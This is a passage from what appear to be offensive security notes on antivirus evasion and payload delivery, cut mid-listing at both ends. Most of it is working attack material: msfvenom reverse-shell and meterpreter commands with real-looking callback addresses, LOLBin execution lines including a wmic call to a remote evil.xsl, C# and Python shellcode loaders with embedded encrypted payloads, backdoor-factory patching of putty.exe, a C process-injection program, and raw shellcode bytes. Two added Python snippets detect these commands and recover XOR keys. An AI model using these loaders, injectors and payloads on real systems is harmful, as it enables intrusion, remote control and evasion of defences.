msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.174.134 LPORT=53 -f dll > qing.dll

msiexec /y C:\qing.dll
```

  • Msbuild

```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe qing.xml
```

Template

  • Installutil

Compile:

```
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out:qing.exe /keyfile:C:\Users\John\Desktop\installutil.snk /unsafe C:\Users\John\Desktop\installutil.cs
```

Execute:

```
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U qing.exe
```

Details

wmic

```
wmic os get /FORMAT:"http://example.com/evil.xsl"
```

Template

csc

```
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.174.132 LPORT=53 -f csharp

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:D:\test\InstallUtil-shell.exe D:\test\InstallUtil-ShellCode.cs
```

Then execute it through InstallUtil.
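Every invocation in the LOLBin section above (and the PowerShell download cradle used earlier on this page) leaves a process-creation record with a distinctive command line, which is where a defender catches it. The following added example, written for this page and not taken from the notes or any product, runs a small set of image/command-line rules over constructed process-creation records in a simple Key=Value|Key=Value format; the paths, the 192.0.2.10 address and the log format are all made up for the example.

```python
import re

# (rule name, regex on the process image path, regex on the command line).
# The patterns mirror the invocations listed in the LOLBin notes above and the
# PowerShell download cradle used earlier on this page.
RULES = [
    ("mshta loading remote HTA", r"(?i)\\mshta\.exe$", r"(?i)https?://"),
    ("msiexec install from URL", r"(?i)\\msiexec\.exe$", r"(?i)/i\s+https?://"),
    ("msiexec /y DLL load", r"(?i)\\msiexec\.exe$", r"(?i)/y\s+\S+\.dll\b"),
    ("msbuild of a standalone .xml project", r"(?i)\\msbuild\.exe$", r"(?i)\s\S+\.xml(\s|$)"),
    ("installutil /U execution", r"(?i)\\installutil\.exe$", r"(?i)\s/u(\s|$)"),
    ("wmic remote XSL stylesheet", r"(?i)\\wmic\.exe$", r"(?i)/format:\S*https?://"),
    ("csc compiling with /unsafe", r"(?i)\\csc\.exe$", r"(?i)\s/unsafe(\s|$)"),
    ("powershell download cradle", r"(?i)\\powershell\.exe$", r"(?i)(iex|invoke-expression)\b.*downloadstring"),
]

# Constructed process-creation records (not real telemetry).
SUSPICIOUS_EVENTS = [
    r'Image=C:\Windows\System32\mshta.exe|CommandLine=mshta.exe http://192.0.2.10/qing.hta|ParentImage=C:\Windows\explorer.exe',
    r'Image=C:\Windows\System32\msiexec.exe|CommandLine=msiexec.exe /q /i http://192.0.2.10/qing.txt|ParentImage=C:\Windows\System32\cmd.exe',
    r'Image=C:\Windows\System32\msiexec.exe|CommandLine=msiexec /y C:\Users\Public\qing.dll|ParentImage=C:\Windows\System32\cmd.exe',
    r'Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe|CommandLine=msbuild.exe qing.xml|ParentImage=C:\Windows\System32\cmd.exe',
    r'Image=C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe|CommandLine=InstallUtil.exe /logfile= /LogToConsole=false /U qing.exe|ParentImage=C:\Windows\System32\cmd.exe',
    r'Image=C:\Windows\System32\wbem\wmic.exe|CommandLine=wmic os get /FORMAT:"http://192.0.2.10/evil.xsl"|ParentImage=C:\Windows\System32\cmd.exe',
    r'Image=C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe|CommandLine=csc.exe /unsafe /platform:x86 /out:D:\test\InstallUtil-shell.exe D:\test\InstallUtil-ShellCode.cs|ParentImage=C:\Windows\System32\cmd.exe',
    r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/Invoke-Mimikatz.ps1')|ParentImage=C:\Windows\System32\cmd.exe",
]
BENIGN_EVENTS = [
    r'Image=C:\Windows\System32\msiexec.exe|CommandLine=msiexec.exe /i C:\Setup\app.msi /qn|ParentImage=C:\Windows\explorer.exe',
    r'Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe|CommandLine=msbuild.exe MyApp.sln /t:Build|ParentImage=C:\Program Files\Microsoft Visual Studio\devenv.exe',
    r'Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell -File C:\scripts\backup.ps1|ParentImage=C:\Windows\System32\svchost.exe',
]


def parse_event(line: str) -> dict:
    """Parse one 'Key=Value|Key=Value' record; only the first '=' in a field splits key from value."""
    event = {}
    for field in line.split("|"):
        key, sep, value = field.partition("=")
        if sep:
            event[key.strip()] = value.strip()
    return event


def match_rules(event: dict) -> list:
    """Names of every rule whose image and command-line patterns both match the record."""
    image = event.get("Image", "")
    cmdline = event.get("CommandLine", "")
    return [name for name, image_re, cmd_re in RULES
            if re.search(image_re, image) and re.search(cmd_re, cmdline)]


def scan_events(lines) -> list:
    """Return (rule, image, command line) for every record that trips a rule."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        for rule in match_rules(event):
            alerts.append((rule, event.get("Image", ""), event.get("CommandLine", "")))
    return alerts


if __name__ == "__main__":
    for rule, image, cmdline in scan_events(SUSPICIOUS_EVENTS + BENIGN_EVENTS):
        print(f"[{rule}] {image}: {cmdline}")
```

The msbuild and csc rules are the weakest on their own (a build server runs both all day), so in practice they are scoped by parent process or by the user context, which is why the records carry a ParentImage field even though these rules do not yet use it.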

C# XOR shellcode wrapper

```csharp
using System;
using System.IO;
using System.Collections.Generic;
using System.Text;
using System.Threading.Tasks;
using System.Security.Cryptography;
using System.Runtime.InteropServices;

namespace RunShellCode
{
    static class Program
    {
        //==============================================================================
        // CRYPTO FUNCTIONS
        //==============================================================================
        private static T[] SubArray<T>(this T[] data, int index, int length)
        {
            T[] result = new T[length];
            Array.Copy(data, index, result, 0, length);
            return result;
        }

        private static byte[] xor(byte[] cipher, byte[] key) {
            byte[] decrypted = new byte[cipher.Length];

            for(int i = 0; i < cipher.Length; i++) {
                decrypted[i] = (byte) (cipher[i] ^ key[i % key.Length]);
            }

            return decrypted;
        }

        //--------------------------------------------------------------------------------------------------
        // Decrypts the given ciphertext byte array with a given 128-bit key
        // Returns the unencrypted message
        //--------------------------------------------------------------------------------------------------
        private static byte[] aesDecrypt(byte[] cipher, byte[] key)
        {
            var IV = cipher.SubArray(0, 16);
            var encryptedMessage = cipher.SubArray(16, cipher.Length - 16);

            // Create an AesManaged object with the specified key and IV.
            using (AesManaged aes = new AesManaged())
            {
                aes.Padding = PaddingMode.PKCS7;
                aes.KeySize = 128;
                aes.Key = key;
                aes.IV = IV;

                using (MemoryStream ms = new MemoryStream())
                {
                    using (CryptoStream cs = new CryptoStream(ms, aes.CreateDecryptor(), CryptoStreamMode.Write))
                    {
                        cs.Write(encryptedMessage, 0, encryptedMessage.Length);
                    }

                    return ms.ToArray();
                }
            }
        }

        //==============================================================================
        // MA IN FUNCTION
        //==============================================================================
        static void Main()
        {
            byte[] encryptedShellcode = new byte[] { 0x8d,0x81,0xec,0x67,0x71,0x69,0x0e,0xee,0x94,0x58,0xae,0x03,0xfa,0x39,0x5e,0xec,0x23,0x65,0xe5,0x35,0x65,0xe2,0x1c,0x4f,0x7e,0xde,0x24,0x41,0x40,0x96,0xc2,0x5b,0x10,0x15,0x6c,0x4b,0x51,0xa8,0xa1,0x6a,0x70,0xae,0x8c,0x95,0x23,0x3e,0xe5,0x35,0x61,0xe2,0x24,0x5b,0xfa,0x25,0x7f,0x1f,0x92,0x21,0x6f,0xb6,0x20,0xe2,0x37,0x47,0x70,0xba,0xe5,0x2e,0x69,0x8a,0x54,0x2e,0xfa,0x5d,0xe5,0x66,0xa7,0x58,0x91,0xcb,0xb0,0xa6,0x63,0x66,0xb6,0x51,0x8e,0x12,0x87,0x6a,0x13,0x9f,0x4a,0x14,0x4a,0x12,0x95,0x31,0xe5,0x3f,0x55,0x68,0xbd,0x01,0xfa,0x65,0x25,0xec,0x29,0x75,0x6f,0xb4,0xfa,0x6d,0xe5,0x66,0xa1,0xe0,0x2a,0x43,0x55,0x32,0x35,0x06,0x28,0x33,0x3f,0x98,0x91,0x36,0x31,0x3d,0xfa,0x7b,0x85,0xea,0x2c,0x01,0x5d,0x55,0x71,0x69,0x06,0x10,0x02,0x5b,0x31,0x33,0x19,0x25,0x19,0x41,0x76,0xe0,0x86,0x98,0xa1,0xd1,0xfe,0x66,0x71,0x69,0x47,0xa3,0x25,0x39,0x06,0x4e,0xf1,0x02,0x6e,0x98,0xa4,0x03,0x64,0x0f,0xb1,0xc1,0xc0,0xe9,0x19,0x6b,0x6e,0x76,0x2d,0xe0,0x88,0x37,0x21,0x39,0x3e,0x27,0x21,0x29,0x3e,0x0f,0x9b,0x66,0xb1,0x87,0x8e,0xbc,0xf9,0x0d,0x61,0x3f,0x39,0x0f,0xe8,0xcc,0x1a,0x06,0x8e,0xbc,0xeb,0xa7,0x05,0x63,0x91,0x29,0x79,0x1c,0x82,0x8f,0x16,0x69,0x6e,0x67,0x1b,0x69,0x04,0x63,0x27,0x3e,0x06,0x65,0xa8,0xa1,0x31,0x98,0xa4,0xea,0x96,0x67,0x0f,0x5f,0xe5,0x51,0x1b,0x29,0x06,0x67,0x61,0x69,0x6e,0x31,0x1b,0x69,0x06,0x3f,0xd5,0x3a,0x8b,0x98,0xa4,0xfa,0x3d,0x0d,0x71,0x3f,0x3d,0x30,0x19,0x6b,0xb7,0xaf,0x2e,0x96,0xbb,0xe4,0x89,0x69,0x13,0x4f,0x29,0x01,0x6e,0x27,0x71,0x69,0x04,0x67,0x21,0x01,0x65,0x48,0x7e,0x59,0x91,0xb2,0x26,0x01,0x1b,0x09,0x3c,0x08,0x91,0xb2,0x2f,0x37,0x91,0x6b,0x55,0x66,0xeb,0x17,0x8e,0x96,0x91,0x8e,0xea,0x96,0x91,0x98,0x70,0xaa,0x47,0xa1,0x04,0xa8,0xad,0xdc,0x81,0xdc,0xcc,0x31,0x1b,0x69,0x3d,0x98,0xa4 };
            string key = "qing";
            string cipherType = "xor";


            byte[] shellcode = null;

            //--------------------------------------------------------------
            // Decrypt the shellcode
            if (cipherType == "xor") {
                shellcode = xor(encryptedShellcode, Encoding.ASCII.GetBytes(key));
            }
            else if (cipherType == "aes") {
                shellcode = aesDecrypt(encryptedShellcode, Convert.FromBase64String(key));
            }

            //--------------------------------------------------------------
            // Copy decrypted shellcode to memory
            UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
            IntPtr hThread = IntPtr.Zero;
            UInt32 threadId = 0;

            // Prepare data
            IntPtr pinfo = IntPtr.Zero;

            // Invoke the shellcode
            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
            WaitForSingleObject(hThread, 0xFFFFFFFF);
            return;
        }

        private static UInt32 MEM_COMMIT = 0x1000;
        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

        // The usual Win32 API trio functions: VirtualAlloc, CreateThread, WaitForSingleObject
        [DllImport("kernel32")]
        private static extern UInt32 VirtualAlloc(
            UInt32 lpStartAddr,
            UInt32 size,
            UInt32 flAllocationType,
            UInt32 flProtect
        );

        [DllImport("kernel32")]
        private static extern IntPtr CreateThread(
            UInt32 lpThreadAttributes,
            UInt32 dwStackSize,
            UInt32 lpStartAddress,
            IntPtr param,
            UInt32 dwCreationFlags,
            ref UInt32 lpThreadId
        );

        [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(
            IntPtr hHandle,
            UInt32 dwMilliseconds
        );
    }
}
```
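On the analyst's side, the weakness of the xor branch above is that a repeating key leaks through any known plaintext, while the aes branch (random IV prepended, key supplied at run time) does not. The following is an added example written for this page, not the wrapper's own code: it recovers the repeating key from an obfuscated blob given a few known leading bytes, and flags whether the known prefix was long enough to confirm the key length. The filler bytes, the keys and the resulting blobs are constructed; the only page-derived value is the six-byte prefix that opens the x64 shellcode listing in the goshell section.

```python
def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same operation both obfuscates and recovers."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# First bytes of the x64 stub shown in the goshell listing above; the bytes that
# follow differ between payloads, so only this short prefix is treated as known.
KNOWN_X64_STUB_PREFIX = b"\xfc\x48\x83\xe4\xf0\xe8"


def recover_xor_key(blob: bytes, known_prefix: bytes, max_key_len: int = 64):
    """Derive the key stream over the known prefix and return the shortest
    repeating key consistent with it, or None if no period up to max_key_len
    fits. 'confirmed' is True only when the prefix covers at least two full
    periods; otherwise a longer key could still be hiding behind the match."""
    if len(blob) < len(known_prefix):
        raise ValueError("blob is shorter than the known prefix")
    stream = xor_bytes(blob[:len(known_prefix)], known_prefix)
    for n in range(1, min(max_key_len, len(stream)) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return {"key": stream[:n], "key_len": n, "confirmed": len(stream) >= 2 * n}
    return None


def analyse_blob(blob: bytes, known_prefix: bytes = KNOWN_X64_STUB_PREFIX) -> dict:
    """Attempt key recovery and report whether the decoded blob starts with the prefix."""
    found = recover_xor_key(blob, known_prefix)
    if found is None:
        return {"recovered": False}
    decoded = xor_bytes(blob, found["key"])
    return {
        "recovered": True,
        "key": found["key"],
        "key_len": found["key_len"],
        "confirmed": found["confirmed"],
        "decoded_prefix_ok": decoded.startswith(known_prefix),
        "decoded": decoded,
    }


if __name__ == "__main__":
    # Constructed sample: the known prefix followed by harmless filler, obfuscated with a 3-byte key.
    filler = b"CONSTRUCTED FILLER, NOT SHELLCODE"
    blob = xor_bytes(KNOWN_X64_STUB_PREFIX + filler, b"key")
    print(analyse_blob(blob))
```

With a six-byte known prefix, a three-byte key is confirmed outright, whereas a four-byte key such as the wrapper's own is found but reported as unconfirmed, which is the cue to extend the known plaintext (the stub bytes after the call displacement, for instance) before trusting the result.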

Python Base64 (k8)

```python
import ctypes
import sys
import base64
#calc.exe
#REJDM0Q5NzQyNEY0QkVFODVBMjcxMzVGMzFDOUIxMzMzMTc3MTc4M0M3MDQwMzlGNDlDNUU2QTM4NjgwMDk1QjU3RjM4MEJFNjYyMUY2Q0JEQkY1N0M5OUQ3N0VEMDA5NjNGMkZEM0VDNEI5REI3MUQ1MEZFNEREMTUxMTk4MUY0QUYxQTFEMDlGRjBFNjBDNkZBMEJGNUJDMjU1Q0IxOURGNTQxQjE2NUYyRjFFRTgxNDg1MjEzODg0OTI2QUEwQUVGRDRBRDE2MzFFQjY5ODA4RDU0QzFCRDkyN0FDMkEyNUVCOTM4M0E4RjVENDIzNTM4MDJFNTBFRTkzRjQyQjM0MTFFOThCQkY4MUM5MkExMzU3OTkyMEQ4MTNDNTI0REZGMDdENTA1NEY3NTFEMTJFREM3NUJBRjU3RDJGNjY1QjgxMkZDRTA0MjczQkZDNTE1MTY2NkFBN0QzMUNEM0E3RUIxRTczQzBEQTk1MUM5N0UyN0Y1OTY3QTkyMkNCRTA3NEI3NEU2RDg3NkQ4Qzg4MDQ4NDZDNkYxNEVENjkyQjkyMUQwMzI0NzcyMkIwNDU1MjQxNTdENjNFQThGMjVFQTRCNA==
shellcode=bytearray(base64.b64decode(sys.argv[1]).decode("hex"))
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))

buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
                                     buf,
                                     ctypes.c_int(len(shellcode)))

ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.c_int(ptr),
                                         ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.pointer(ctypes.c_int(0)))

ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
```

Python hex

```python
import ctypes
import sys
#calc.exe
#sc = "DBC3D97424F4BEE85A27135F31C9B13331771783C704039F49C5E6A38680095B57F380BE6621F6CBDBF57C99D77ED00963F2FD3EC4B9DB71D50FE4DD1511981F4AF1A1D09FF0E60C6FA0BF5BC255CB19DF541B165F2F1EE81485213884926AA0AEFD4AD1631EB69808D54C1BD927AC2A25EB9383A8F5D42353802E50EE93F42B3411E98BBF81C92A13579920D813C524DFF07D5054F751D12EDC75BAF57D2F665B812FCE04273BFC5151666AA7D31CD3A7EB1E73C0DA951C97E27F5967A922CBE074B74E6D876D8C8804846C6F14ED692B921D03247722B045524157D63EA8F25EA4B4"
shellcode=bytearray(sys.argv[1].decode("hex"))
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))

buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
                                     buf,
                                     ctypes.c_int(len(shellcode)))

ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.c_int(ptr),
                                         ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.pointer(ctypes.c_int(0)))

ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
```

shellcode_encoder

  • shellcode_encoder

windows下无法运行,须在linux下运行

举例msfvenom

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
root@kali:~# msfvenom -l encoder

Framework Encoders [--encoder <value>]
======================================

Name Rank Description
---- ---- -----------
cmd/brace low Bash Brace Expansion Command Encoder
cmd/echo good Echo Command Encoder
cmd/generic_sh manual Generic Shell Variable Substitution Command Encoder
cmd/ifs low Bourne ${IFS} Substitution Command Encoder
cmd/perl normal Perl Command Encoder
cmd/powershell_base64 excellent Powershell Base64 Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/eicar manual The EICAR Encoder
generic/none normal The "none" Encoder
mipsbe/byte_xori normal Byte XORi Encoder
mipsbe/longxor normal XOR Encoder
mipsle/byte_xori normal Byte XORi Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 Encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
ruby/base64 great Ruby Base64 Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x64/xor_context normal Hostname-based Context Keyed Payload Encoder
x64/xor_dynamic normal Dynamic key XOR Encoder
x64/zutto_dekiru manual Zutto Dekiru
x86/add_sub manual Add/Sub Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_underscore_tolower manual Avoid underscore/tolower
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/bloxor manual BloXor - A Metamorphic Block Based XOR Encoder
x86/bmp_polyglot manual BMP Polyglot
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/opt_sub manual Sub Encoder (optimised)
x86/service manual Register Service
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder
x86/xor_dynamic normal Dynamic key XOR Encoder

Using a template binary (-x) and an encoder

msfvenom -p windows/shell_reverse_tcp -x /usr/share/windows-binaries/plink.exe lhost=1.1.1.1 lport=4444 -a x86 --platform win -f exe -o a.exe

msfvenom -p windows/shell/bind_tcp -x /usr/share/windows-binaries/plink.exe lhost=1.1.1.1 lport=4444 -e x86/shikata_ga_nai -i 5 -a x86 --platform win -f exe > b.exe

Note that the platform switch is --platform (two dashes). Without -k the template is only a wrapper: plink.exe's own code does not run, the payload replaces its entry point; add -k to keep the template's behaviour and run the payload in a new thread.

Invoke-Obfuscation

Install and load (run from an administrator PowerShell):

Set-ExecutionPolicy Unrestricted
Import-Module ./Invoke-Obfuscation.psd1
Invoke-Obfuscation

Non-interactive use: obfuscate a script block with the given Encoding and Launcher options and print only the result:

Invoke-Obfuscation -ScriptBlock {echo xss} -Command 'Encoding\1,Launcher\PS\67' -Quiet

the-backdoor-factory

apt-get install backdoor-factory

BDF can also split the payload across several code caves instead of one (its --cave_jumping option).

List the payloads available for the target binary, then patch one in:

backdoor-factory -f putty.exe -s show

backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.15.135 -P 4444

Spawning a legitimate process and injecting shellcode

Start a benign process (calc.exe) suspended, write the shellcode into its address space and run it on a remote thread. The shellcode below is x86, so build this as a 32-bit binary: from a 32-bit process the system32 path is redirected to SysWOW64, so the 32-bit calc.exe is spawned and the architecture matches.

// Visual Studio projects with precompiled headers need #include "stdafx.h" first
#include <Windows.h>
#include <stdio.h>

unsigned char shellcode[] =
"\xb8\x72\xd9\xb8\x52\xda\xd8\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
"\x56\x83\xc2\x04\x31\x42\x0f\x03\x42\x7d\x3b\x4d\xae\x69\x39"
"\xae\x4f\x69\x5e\x26\xaa\x58\x5e\x5c\xbe\xca\x6e\x16\x92\xe6"
"\x05\x7a\x07\x7d\x6b\x53\x28\x36\xc6\x85\x07\xc7\x7b\xf5\x06"
"\x4b\x86\x2a\xe9\x72\x49\x3f\xe8\xb3\xb4\xb2\xb8\x6c\xb2\x61"
"\x2d\x19\x8e\xb9\xc6\x51\x1e\xba\x3b\x21\x21\xeb\xed\x3a\x78"
"\x2b\x0f\xef\xf0\x62\x17\xec\x3d\x3c\xac\xc6\xca\xbf\x64\x17"
"\x32\x13\x49\x98\xc1\x6d\x8d\x1e\x3a\x18\xe7\x5d\xc7\x1b\x3c"
"\x1c\x13\xa9\xa7\x86\xd0\x09\x0c\x37\x34\xcf\xc7\x3b\xf1\x9b"
"\x80\x5f\x04\x4f\xbb\x5b\x8d\x6e\x6c\xea\xd5\x54\xa8\xb7\x8e"
"\xf5\xe9\x1d\x60\x09\xe9\xfe\xdd\xaf\x61\x12\x09\xc2\x2b\x7a"
"\xfe\xef\xd3\x7a\x68\x67\xa7\x48\x37\xd3\x2f\xe0\xb0\xfd\xa8"
"\x71\xd6\xfd\x67\x39\xb7\x03\x88\x39\x91\xc7\xdc\x69\x89\xee"
"\x5c\xe2\x49\x0e\x89\x9e\x43\x98\xf2\xf6\xfa\xdc\x9b\x04\x03"
"\xcc\x07\x81\xe5\xbe\xe7\xc1\xb9\x7e\x58\xa1\x69\x17\xb2\x2e"
"\x55\x07\xbd\xe5\xfe\xa2\x52\x53\x56\x5b\xca\xfe\x2c\xfa\x13"
"\xd5\x48\x3c\x9f\xdf\xad\xf3\x68\xaa\xbd\xe4\x0e\x54\x3e\xf5"
"\xba\x54\x54\xf1\x6c\x03\xc0\xfb\x49\x63\x4f\x03\xbc\xf0\x88"
"\xfb\x41\xc0\xe3\xca\xd7\x6c\x9c\x32\x38\x6c\x5c\x65\x52\x6c"
"\x34\xd1\x06\x3f\x21\x1e\x93\x2c\xfa\x8b\x1c\x04\xae\x1c\x75"
"\xaa\x89\x6b\xda\x55\xfc\xef\x1d\xa9\x82\xc7\x85\xc1\x7c\x58"
"\x36\x11\x17\x58\x66\x79\xec\x77\x89\x49\x0d\x52\xc2\xc1\x84"
"\x33\xa0\x70\x98\x19\x64\x2c\x99\xae\xbd\xdf\xe0\xdf\x42\x20"
"\x15\xf6\x26\x21\x15\xf6\x58\x1e\xc3\xcf\x2e\x61\xd7\x6b\x20"
"\xd4\x7a\xdd\xab\x16\x28\x1d\xfe";


BOOL injection()
{
    wchar_t Cappname[MAX_PATH] = { 0 };
    STARTUPINFOW si;
    PROCESS_INFORMATION pi;
    LPVOID lpnewVictimBaseAddr;
    HANDLE hThread;
    DWORD dwExitCode;
    BOOL bRet = FALSE;

    // Host process: %SystemRoot%\system32\calc.exe
    GetSystemDirectoryW(Cappname, MAX_PATH);
    wcscat_s(Cappname, MAX_PATH, L"\\calc.exe");
    printf("Injection program Name:%S\r\n", Cappname);

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));

    // Create the host suspended: its own main thread never runs
    if (CreateProcessW(Cappname, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED,
                       NULL, NULL, &si, &pi) == 0)
    {
        return bRet;
    }

    // RWX region in the target; sizeof(shellcode) already includes the literal's trailing NUL
    lpnewVictimBaseAddr = VirtualAllocEx(pi.hProcess, NULL, sizeof(shellcode),
                                         MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (lpnewVictimBaseAddr == NULL ||
        !WriteProcessMemory(pi.hProcess, lpnewVictimBaseAddr, shellcode, sizeof(shellcode), NULL))
    {
        TerminateProcess(pi.hProcess, 0);
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
        return bRet;
    }

    hThread = CreateRemoteThread(pi.hProcess, 0, 0,
                                 (LPTHREAD_START_ROUTINE)lpnewVictimBaseAddr, NULL, 0, NULL);
    if (hThread != NULL)
    {
        // Wait on the injected thread, not on pi.hThread: the main thread is still
        // suspended and never finishes, so waiting on it would block forever
        WaitForSingleObject(hThread, INFINITE);
        CloseHandle(hThread);
        bRet = TRUE;
    }

    GetExitCodeProcess(pi.hProcess, &dwExitCode);
    TerminateProcess(pi.hProcess, 0);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return bRet;
}

void help(char* proc)
{
    printf("%s:[-] start a process and inject shellcode into its memory\r\n", proc);
}

int main(int argc, char* argv[])
{
    help(argv[0]);
    return injection() ? 0 : 1;
}

Loading XOR-encoded shellcode with Go

Generate a piece of shellcode with msfvenom (the num format prints it as a comma-separated list of 0xNN values):

msfvenom -p windows/x64/meterpreter/reverse_tcp -f num LHOST=45.32.137.154 LPORT=3356

0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xcc, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 
0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48,
0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9,
0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48,
0x01, 0xd0, 0x66, 0x81, 0x78, 0x18, 0x0b, 0x02, 0x0f, 0x85, 0x72, 0x00, 0x00, 0x00, 0x8b,
0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b,
0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41,
0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1,
0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45,
0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b,
0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01,
0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48,
0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9,
0x4b, 0xff, 0xff, 0xff, 0x5d, 0x49, 0xbe, 0x77, 0x73, 0x32, 0x5f, 0x33, 0x32, 0x00, 0x00,
0x41, 0x56, 0x49, 0x89, 0xe6, 0x48, 0x81, 0xec, 0xa0, 0x01, 0x00, 0x00, 0x49, 0x89, 0xe5,
0x49, 0xbc, 0x02, 0x00, 0x0d, 0x1c, 0x2d, 0x20, 0x89, 0x9a, 0x41, 0x54, 0x49, 0x89, 0xe4,
0x4c, 0x89, 0xf1, 0x41, 0xba, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x4c, 0x89, 0xea, 0x68,
